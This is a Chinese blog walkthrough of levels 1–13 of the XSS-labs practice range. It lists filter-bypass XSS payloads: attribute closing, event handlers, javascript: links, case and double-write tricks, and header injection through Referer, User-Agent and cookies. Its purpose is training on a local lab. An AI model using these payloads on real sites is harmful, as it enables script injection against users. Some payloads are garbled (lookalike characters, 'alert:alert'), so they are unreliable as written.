XSS-labs闯关(1-13关)

最新推荐文章于 2023-10-21 15:56:00 发布
最新推荐文章于 2023-10-21 15:56:00 发布
阅读量470 收藏 2
点赞数 2
文章标签: xss servlet java javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yangfanqihang_1/article/details/127164033
版权

目录

level1

level2

level3

level4

level5

level6

level7

level8-添加友情链接

level9-添加友情链接,你的连接不合法

level10

level11

level12

level13

level1

无任何防御检测:

<script>alert(1)</script>

level2

存在WAF检测的情况:

value="<script>alert(1)</script>">

页面存在回显,查看源代码看看他的闭合符是什么,将左面的进行闭合,在进行注入

"> <script>alert(1)</script> " 

> -->将左边的进行闭合

level3

存在将字符编码

如:< 编码成&lt;>编码成&gt;"编码成&quot;

value='&lt;script&gt;alert(1)&lt;/script&gt;'>

先进性闭合,写一个onmouseover事件 ' οnmοuseοver='alert(/xss/)'> 前后为单引号,所以我们闭合也应为单引号 此事件为将鼠标放到输入窗口触发事件即注入成功

level4

<script " 'Oonn>进行测试看看网页将什么注释掉了

查看他将<>注释掉了

可以进行onmousover事件来触发 " οnmοuseοver="alert(/xss/) 前后为双引号,所以我们闭合也应为双引号

level5

将关键字过滤了

value="<scr_ipt " 'oo_nn>">

进行伪协议来触发(超链接) "> <a href="javascript:alert:alert(/xss/)">click</a> 源码:value=""> <a href="javascript:alert:alert(/xss/)">click</a> ">

level6

<script " 'Oonn>进行测试

value="<scr_ipt " 'oo_nn>">将关键字过滤了

输入"> <a href="javascript:alert:alert(/xss/)">click</a>发现

value=""> <a hr_ef="javascript:alert:alert(/xss/)">click</a>">被注释

尝试大小写进行注入 "> <a hREf="javascript:alert(/xss/)">click</a>

level7

<script " 'Oonn>进行测试

value="< " 'on>"> 发现只剩下一个on

尝试双写注入 " oonnmouseover="alert(/xss/)

level8-添加友情链接

<script " 'Oonn>进行测试

<a href="<scr_ipt &quot 'oo_nn>">

尝试超链接注入javascript:alert(/xss/)

<a href="javascr_ipt:alert:alert(/xss/)"> 发现script被注释

对s进行十六进制编码进行注入:s --> s javascript:alert(/xss/)

level9-添加友情链接,你的连接不合法

<script " 'Oonn>进行测试

<a href="您的链接不合法?有没有!">

尝试超链接注入javascript:alert(/xss/)依旧为上面的不合法

将(/xss/)改为正常的网页连接 Javascript:alert('http://baidu.com')

level10

发现无输入框,再看请求头发现为GET请求

发现input有三个输出

<input name="t_link" value="" type="hidden">

<input name="t_history" value="" type="hidden">

<input name="t_sort" value="" type="hidden">

一个一个进行尝试

http://localhost/xss-labs/xss/level10.php?t_link=1

http://localhost/xss-labs/xss/level10.php?t_history=1

http://localhost/xss-labs/xss/level10.php?t_sort=1

发现t_sort=1的value有回显

<input name="t_sort" value="1" type="hidden">

对t_sort字段进行注入

创建一个click按钮,点击之后注入成功

click" type="button" οnclick="alert(/xss/)

level11

测试:<script " ' Oonn>

发现四个input,想到尝试一个一个注入

<input name="t_link" value="" type="hidden">

<input name="t_history" value="" type="hidden">

<input name="t_sort" value="" type="hidden">

<input name="t_ref" value="

http://localhost/xss-labs/xss/level10.php?t_sort=click%22%20type=%22button%22%20οnclick=%22alert(/xss/)" type="hidden">

但是GET请求头会有字段我们需要抓取包获得

打开bp抓包找到referer字段

Referer: http://localhost/xss-labs/xss/level11.php?t_sort=click%27%20type=%27button%27%20οnclick=%27alert(1)

我们对referer字段进行修改

设置文本框注入

" type="text" οnclick="alert(/xss/)

也可以设置click按钮进行注入

click" type="button" οnclick="alert(/xss/)

level12

跟11关一样,只不过是User-Agent字段注入

level13

分析页面代码,为cookie字段注入

Yangfanqihang_1
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
xss-lab全通教程
05-07
xss-lab全通教程,共有20个,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
XSS-labs
em.....
10-24 4209
XSS-labs 1.第一 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三 ​ ​ 用第二的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
XSS-labs靶场练习
Sapphire037的博客
10-04 350
1.环境搭建 先去GitHub下载,点这。然后利用phpstudy启动服务访问即可,具体的百度都有。 level 1 观察源代码 <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() { confirm("完成的不错!"); window.location.href="level2.php?ke
xss-labs靶场的搭建和通(1-18)
qq_53003652的博客
04-12 1214
这次的xsslabs通耗费了挺多时间,由于本人才学疏浅,难免会有一些错误,希望大家能指正批评,如有疑问,可在下方留言,会第一时间进行回复!
XSS过(一) 1~5 详细
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
04-04 1021
最近在玩xss,就决定把思路写下来,以备忘 第一 很简单,把test换成<script>alert(1)</script>就行 <script>alert(1)</script> 第二 也有些简单,找到注入点,发现input标签里的可用 于是加上 "/> 以闭合value,再加上<script>alert(1)</...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.pdf
04-20
xss-labs靶场20全通攻略
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
最新发布
m0_67844671的博客
10-21 4484
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-labs大合集
热门推荐
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一主要就是考察反射型xss 但是由于不
xss-labs靶场全通
m0_52051132的博客
10-15 1580
在这里于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
xss-labs搭建及通攻略
K_ShenH的博客
02-03 1万+
xss-labs搭建 (1)首先当然是需要phpstudy的环境,所以要先下载安装phpstudy。 (2)然后到github的网址中下载源码的压缩包。 下载链接:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 (3)下载后解压缩到phpstudy目录下的WWW子文件夹中,把压缩包的名字改成xss-labs。 (4)然后在输入url HTTPS://127.0.0.1/xss-labs/就可以访问靶场。 xss-labs攻略 level...
【XSS漏洞-05】XSS-labs靶场通大挑战
m0_64378913的博客
05-31 2775
目录1 实验简介2 XSS通过程2.0 通前注意2.1 卡12.2 卡22.3 卡32.4 卡42.5 卡52.6 卡62.7 卡72.8 卡82.9 卡92.10 卡102.11 卡112.12 卡122.13 卡133 总结 1 实验简介 实验网站/靶场:http://test.ctf8.com/。 实验目的: 熟悉XSS漏洞测试的过程; 判断是否过滤与过滤规则; 练习XSS语句构造与绕过方法; 一边练习一边结合SQL注入进行比较; 一边练习一边思考编码与转码,后续补充这
xss-labs靶场一到十
zxcvbnm123456x的博客
06-26 787
xss的靶场地址为:http://test.ctf8.com/需要先打开phpstudy才能进行练习。
xss_labs通教程
qq_48904485的博客
03-23 643
level1 1、url输入特殊字符判断位置 2、构造Payload /level1.php?name=</h2><script>alert("xss")</script> level2 1、url输入特殊字符判断位置 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BKe2fY6Q-1647921941027)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-
典中典之xss labs通
weixin_51681694的博客
04-18 149
至于其他网上说的<>在源码中被实体转义,我发现其实这跟标签无,源码中的<>无论什么标签都会被转义,至于<script>无法解析,<img>可以解析,我认为与ng-include的特性有。针对html实体编码,无论是事件触发还是其他,则是等号后面或者说是单双引号中间的部分进行实体编码可执行。既然是伪协议,我就测试了一下%0d,%0a,%09,%20能否执行在 javascript中。难绷,只对http:// 加白,难道https://不合法?这比较狠, < > " 都被实体编码了,意味着无法逃逸。
xss-labs初学者通详解1-18
m0_70483044的博客
11-14 2624
菜鸟都能看懂的新手教程~新手学习指南之xss-labs靶场通!!错误的地方欢迎指正哦~
xss-labs第14
08-18
- *3* [渗透测试之---xss-labs【1-14】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yangfanqihang_1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值